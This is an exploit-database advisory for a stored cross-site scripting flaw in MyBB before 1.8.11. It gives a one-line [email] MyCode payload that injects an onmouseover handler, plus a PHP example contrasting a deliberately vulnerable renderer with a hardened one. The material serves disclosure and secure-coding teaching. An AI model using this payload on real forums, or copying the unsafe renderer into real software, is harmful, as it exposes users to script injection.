MyBB < 1.8.11 - email MyCode Cross-Site Scripting Vulnerability

2017-04-11T00:00:00
ID 1337DAY-ID-27562
Type zdt
Reporter Zhiyang Zeng
Modified 2017-04-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
Description:
============
 
Product: MyBB
Homepage: https://mybb.com/
Vulnerable version: <1.8.11
Severity: High risk
 
===============
 
Proof of Concept:
=============
 
1. Post a thread or reply to any thread, and write:
 
[email=2"onmouseover="alert(document.location)]hover me[/email]
 
Then, when a user's mouse hovers over it, the XSS attack will occur!
 
============
 
Fixed:
============
 
This vulnerability was fixed in version 1.8.11
 
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
 
=============
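
The attribute breakout behind the proof of concept above, shown in a simplified [email] renderer with an unsafe and a hardened variant. This is an added example, not MyBB's parser code or its 1.8.11 patch; the function names are hypothetical and both renderers assume they receive raw, unescaped post text.

```php
<?php
// Added illustration: a simplified [email=...] MyCode renderer, NOT MyBB's parser.
// Assumption: $message is raw post text that has not been HTML-escaped yet.

// Unsafe: the tag argument is copied into href="..." as-is, so a double quote
// in it closes the attribute and the rest is parsed as new attributes.
function render_email_unsafe(string $message): string
{
    return preg_replace_callback(
        '#\[email=(.*?)\](.*?)\[/email\]#is',
        function (array $m): string {
            return '<a href="mailto:' . $m[1] . '">' . $m[2] . '</a>';
        },
        $message
    );
}

// Hardened: accept only a syntactically valid address, and still escape every
// value for the HTML context it lands in (validation alone is not relied on).
function render_email_safe(string $message): string
{
    return preg_replace_callback(
        '#\[email=(.*?)\](.*?)\[/email\]#is',
        function (array $m): string {
            $address = filter_var($m[1], FILTER_VALIDATE_EMAIL);
            if ($address === false) {
                // Not an e-mail address: show the tag as inert, escaped text.
                return htmlspecialchars($m[0], ENT_QUOTES, 'UTF-8');
            }
            return '<a href="mailto:' . htmlspecialchars($address, ENT_QUOTES, 'UTF-8') . '">'
                 . htmlspecialchars($m[2], ENT_QUOTES, 'UTF-8') . '</a>';
        },
        $message
    );
}

// Inputs: the PoC string from this advisory and a constructed benign post.
$inputs = [
    '[email=2"onmouseover="alert(document.location)]hover me[/email]',
    '[email=user@example.com]mail me[/email]',
];

foreach ($inputs as $input) {
    echo 'unsafe: ', render_email_unsafe($input), "\n";
    echo 'safe:   ', render_email_safe($input), "\n\n";
}
```

For the PoC input the unsafe renderer emits an `<a>` element carrying an attacker-supplied `onmouseover` attribute, while the hardened one emits the tag as literal text with `"` encoded as `&quot;`.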

#  0day.today [2018-04-02]  #